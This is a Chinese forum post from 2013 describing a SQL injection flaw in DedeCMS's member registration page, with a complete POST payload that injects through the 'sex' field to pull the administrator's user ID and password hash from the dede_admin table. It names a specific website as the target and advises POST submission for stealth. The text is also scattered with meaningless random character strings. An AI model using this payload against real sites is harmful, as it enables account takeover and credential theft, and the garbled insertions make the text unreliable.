漏洞类型: SQL注射漏洞, B/ r5 j0 i/ w. W- f! W0 i
简要描述:, W' a8 w& W% T, w
/ I$ O" ~% l& t) C
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
8 a" Z/ j3 @4 c9 T# G5 j原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.4 G# O0 i! v) I3 L7 x3 B8 M4 t
详细说明:跟这个漏洞
0 A0 N0 }& ^# O* t
$ n% V; u1 V3 o) ]# IWooYun: Dedecms SQL注射导致审核机制绕过漏洞
5 Y/ ~+ P" \! n: P' J) {是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
4 f1 @" ?% m8 s+ }! K& xPOST提交以下数据,其实不用POST提交的,这样隐蔽点.$ ?; c8 L3 y" W" K4 K9 X" f+ F" k
) Z3 q& P) a S! ^% D D X k. k. Xwww.political-security.com/member/reg_new.php
l3 R. l* S1 ]6 G# E # b4 S3 U4 B, Q; O
POST
7 Z0 q& c- B# \" h% s: e0 L* a
9 C+ D7 ^' x" v3 F' T1 zdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&0 g, n; X/ T7 R0 |0 E
userid=c4rp3nt3r&uname=c4rp3nt3r9 B& x) L W+ J0 }6 b$ b
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss4 D# H( n0 K! R* n
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`, ^4 q6 @4 {+ H
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
+ i) j: P& C& y h% m%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对